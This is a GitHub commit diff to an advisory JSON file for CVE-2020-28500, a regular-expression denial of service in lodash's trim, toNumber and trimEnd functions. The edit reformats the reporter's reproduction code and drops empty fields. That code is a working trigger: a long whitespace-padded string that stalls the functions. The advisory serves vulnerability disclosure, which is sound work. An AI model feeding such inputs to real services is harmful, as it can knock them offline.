Improve GHSA-29mw-wpgm-hmr9

github · Oct 20, 2023 · b6fe667 · b6fe667
1 parent 33dd6b4
commit b6fe667
Showing 1 changed file with 2 additions and 22 deletions.
diff --git a/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json b/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json
@@ -1,13 +1,13 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-29mw-wpgm-hmr9",
-  "modified": "2023-09-05T22:58:25Z",
+  "modified": "2023-10-18T22:34:24Z",
   "published": "2022-01-06T20:30:46Z",
   "aliases": [
     "CVE-2020-28500"
   ],
   "summary": "Regular Expression Denial of Service (ReDoS) in lodash",
-  "details": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. \n\nSteps to reproduce (provided by reporter Liyuan Chen):\n```js\nvar lo = require('lodash');\n\nfunction build_blank(n) {\n    var ret = \"1\"\n    for (var i = 0; i < n; i++) {\n        ret += \" \"\n    }\n    return ret + \"1\";\n}\nvar s = build_blank(50000) var time0 = Date.now();\nlo.trim(s) var time_cost0 = Date.now() - time0;\nconsole.log(\"time_cost0: \" + time_cost0) var time1 = Date.now();\nlo.toNumber(s) var time_cost1 = Date.now() - time1;\nconsole.log(\"time_cost1: \" + time_cost1) var time2 = Date.now();\nlo.trimEnd(s) var time_cost2 = Date.now() - time2;\nconsole.log(\"time_cost2: \" + time_cost2)\n```",
+  "details": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the `toNumber`, `trim` and `trimEnd` functions. \n\nSteps to reproduce (provided by reporter Liyuan Chen):\n```js\nvar lo = require('lodash');\n\nfunction build_blank(n) {\n    var ret = \"1\"\n    for (var i = 0; i < n; i++) {\n        ret += \" \"\n    }\n    return ret + \"1\";\n}\n\nvar s = build_blank(50000);\nvar time0 = Date.now();\nlo.trim(s);\nvar time_cost0 = Date.now() - time0;\nconsole.log(\"time_cost0: \" + time_cost0);\n\nvar time1 = Date.now();\nlo.toNumber(s);\nvar time_cost1 = Date.now() - time1;\nconsole.log(\"time_cost1: \" + time_cost1);\n\nvar time2 = Date.now();\nlo.trimEnd(s);\nvar time_cost2 = Date.now() - time2;\nconsole.log(\"time_cost2: \" + time_cost2);\n```",
   "severity": [
     {
       "type": "CVSS_V3",
@@ -20,11 +20,6 @@
         "ecosystem": "npm",
         "name": "lodash"
       },
-      "ecosystem_specific": {
-        "affected_functions": [
-          ""
-        ]
-      },
       "ranges": [
         {
           "type": "ECOSYSTEM",
@@ -44,11 +39,6 @@
         "ecosystem": "npm",
         "name": "lodash-es"
       },
-      "ecosystem_specific": {
-        "affected_functions": [
-          ""
-        ]
-      },
       "ranges": [
         {
           "type": "ECOSYSTEM",
@@ -68,11 +58,6 @@
         "ecosystem": "npm",
         "name": "lodash.trimend"
       },
-      "ecosystem_specific": {
-        "affected_functions": [
-          ""
-        ]
-      },
       "ranges": [
         {
           "type": "ECOSYSTEM",
@@ -92,11 +77,6 @@
         "ecosystem": "npm",
         "name": "lodash.trim"
       },
-      "ecosystem_specific": {
-        "affected_functions": [
-          ""
-        ]
-      },
       "ranges": [
         {
           "type": "ECOSYSTEM",